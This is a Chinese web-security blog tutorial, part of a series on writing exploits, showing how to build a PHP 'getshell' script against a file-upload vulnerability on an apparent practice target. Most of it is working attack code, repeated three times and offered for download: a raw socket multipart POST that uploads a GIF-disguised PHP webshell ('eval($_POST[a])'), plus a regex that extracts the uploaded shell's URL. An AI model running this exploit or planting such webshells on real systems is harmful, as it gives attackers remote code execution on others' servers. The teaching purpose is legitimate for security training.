?

Sep 27 2018

WEB安全第七章exp編寫三

首頁 » 原創作品 » WEB安全第七章exp編寫三   

WEB安全第七章exp編寫三 GETSHELL編寫


上篇 我教大家編寫了一個post注入的exp這一節同樣也是關于post提交,很多同學都喜歡GETHSELL ,怎么寫GETHSLL腳本,

gethshell就是直接得到權限,有直接指向執行命令,或上傳一個木馬 (getwebshell)。

訪問暗月靶機系統 訪問上傳漏洞測試。


13.png

14.png


通過測試 上傳漏洞測試 是可以直接上傳圖片木馬的。 直接使用burpsuite抓包 。


POST /upload.php HTTP/1.1
Host: target_sys.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://target_sys.com/upload.php
Content-Type: multipart/form-data; boundary=---------------------------86531354118821
Content-Length: 23124
Cookie: PHPSESSID=8fj89vrpvaavg5sc92ifg5gu75
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------86531354118821
Content-Disposition: form-data; name="file"; filename="1.jpg"
Content-Type: image/jpeg

GIF89ad




使用php編寫GETSHELL 是使用socket擴展 確保 php.ini  開啟 socket.dll


function http_send($host, $packet){

        $sock = fsockopen($host, 80);
        
        if(!$sock){
                print "\n[-] No response from {$host}:80 Trying again...";
                $sock = fsockopen($host, 80);
        }
        
        fputs($sock, $packet);
        
        while (!feof($sock)) {

                $resp .= fread($sock, 1024);
        }
        
        fclose($sock);
        return $resp;

}


以上代碼是模擬post包發送和獲取。


    function data($host,$filename){
       
        $payload  = "-----------------------------86531354118821\r\n";
        $payload .= "Content-Disposition: form-data; name="file"; filename="{$filename}"\r\n";
        $payload .= "Content-Type:  image/jpeg\r\n\r\n";
        $payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\r\n";
        $payload .= "-----------------------------86531354118821\r\n";
        $payload .= "Content-Disposition: form-data; name="sub"";
        $payload .="\r\n\r\n";
        $payload .="12132\r\n";
        $payload .="-----------------------------86531354118821--\r\n";
        $packet  = "POST /upload.php HTTP/1.1\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Content-Type: multipart/form-data; boundary=---------------------------86531354118821\r\n";
        $packet .= "Content-Length: ".strlen($payload)."\r\n";
        $packet .= "Connection: close\r\n\r\n";
        $packet .= $payload;
       
        return $packet;

    }




模擬POST包提交,這里跟抓來的包處理后 是相同。


---------------------------86531354118821-- 這個部分是提交匹配的代碼。


16.png


$payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\r\n";


這部分是你要上傳的圖片木馬內容 



  1. $filename  = "moon.php";

  2. $host = "target_sys.com";
  3. print http_send($host,data($host,$filename));



$filename 這個是上傳的文件名,$host 這個部分是域名。

以下是getshell的代碼。保存為exp2.php


<?php

function http_send($host, $packet){

        $sock = fsockopen($host, 80);
        
        if(!$sock){
                print "\n[-] No response from {$host}:80 Trying again...";
                $sock = fsockopen($host, 80);
        }
        
        fputs($sock, $packet);
        
        while (!feof($sock)) {

                $resp .= fread($sock, 1024);
        }
        
        fclose($sock);
        return $resp;

}



function data($host,$filename){
        
        $payload  = "-----------------------------86531354118821\r\n";
        $payload .= "Content-Disposition: form-data; name="file"; filename="{$filename}"\r\n";
        $payload .= "Content-Type:  image/jpeg\r\n\r\n";
        $payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\r\n";
        $payload .= "-----------------------------86531354118821\r\n";
        $payload .= "Content-Disposition: form-data; name="sub"";
        $payload .="\r\n\r\n";
        $payload .="12132\r\n";
        $payload .="-----------------------------86531354118821--\r\n";
        $packet  = "POST /upload.php HTTP/1.1\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Content-Type: multipart/form-data; boundary=---------------------------86531354118821\r\n";
        $packet .= "Content-Length: ".strlen($payload)."\r\n";
        $packet .= "Connection: close\r\n\r\n";
        $packet .= $payload;
        
        return $packet;

}

$filename  = "moon.php";

$host = "target_sys.com";
print http_send($host,data($host,$filename));



執行腳本如圖

17.png


終端下返回信息,有很多內容 并不是想要的,所以要進行WEBSHELL的路徑進行截取。返回所需的內容。完整的exp如下

	    <?php

    function http_send($host, $packet){

            $sock = fsockopen($host, 80);
            
            if(!$sock){
                    print "\n[-] No response from {$host}:80 Trying again...";
                    $sock = fsockopen($host, 80);
            }
            
            fputs($sock, $packet);
            
            while (!feof($sock)) {

                    $resp .= fread($sock, 1024);
            }
            
            fclose($sock);
            return $resp;

    }



    function data($host,$filename){
            
            $payload  = "-----------------------------86531354118821\r\n";
            $payload .= "Content-Disposition: form-data; name="file"; filename="{$filename}"\r\n";
            $payload .= "Content-Type:  image/jpeg\r\n\r\n";
            $payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\r\n";
            $payload .= "-----------------------------86531354118821\r\n";
            $payload .= "Content-Disposition: form-data; name="sub"";
            $payload .="\r\n\r\n";
            $payload .="12132\r\n";
            $payload .="-----------------------------86531354118821--\r\n";
            $packet  = "POST /upload.php HTTP/1.1\r\n";
            $packet .= "Host: {$host}\r\n";
            $packet .= "Content-Type: multipart/form-data; boundary=---------------------------86531354118821\r\n";
            $packet .= "Content-Length: ".strlen($payload)."\r\n";
            $packet .= "Connection: close\r\n\r\n";
            $packet .= $payload;
            
            return $packet;

    }


    $filename  = "moon.php";
    $host = "target_sys.com";
    $html_str =http_send($host,data($host,$filename));

    preg_match("/Stored in: (.*?)</", $html_str,$m);

    if ($m[1]){
            echo "http://".$host."/".$m[1];
    }else{
            echo "flase";
    }



exp下載 exp2.rar


執行腳本


18.png

如果您喜歡本博客,歡迎點擊圖片定訂閱到郵箱填寫您的郵件地址,訂閱我們的精彩內容:

正文部分到此結束

文章標簽: exp編寫

版權聲明:若無特殊注明,本文皆為( mOon )原創,轉載請保留文章出處。

也許喜歡: «WEB安全第七章exp編寫四 | WEB安全第七章exp編寫二»

你腫么看?

你還可以輸入 250/250 個字

? 微笑 大笑 拽 大哭 親親 流汗 噴血 奸笑 囧 不爽 暈 示愛 害羞 吃驚 驚嘆 愛你 嚇死了 呵呵

評論信息框

這篇文章還沒有收到評論,趕緊來搶沙發吧~

?
?
河北11选5开奖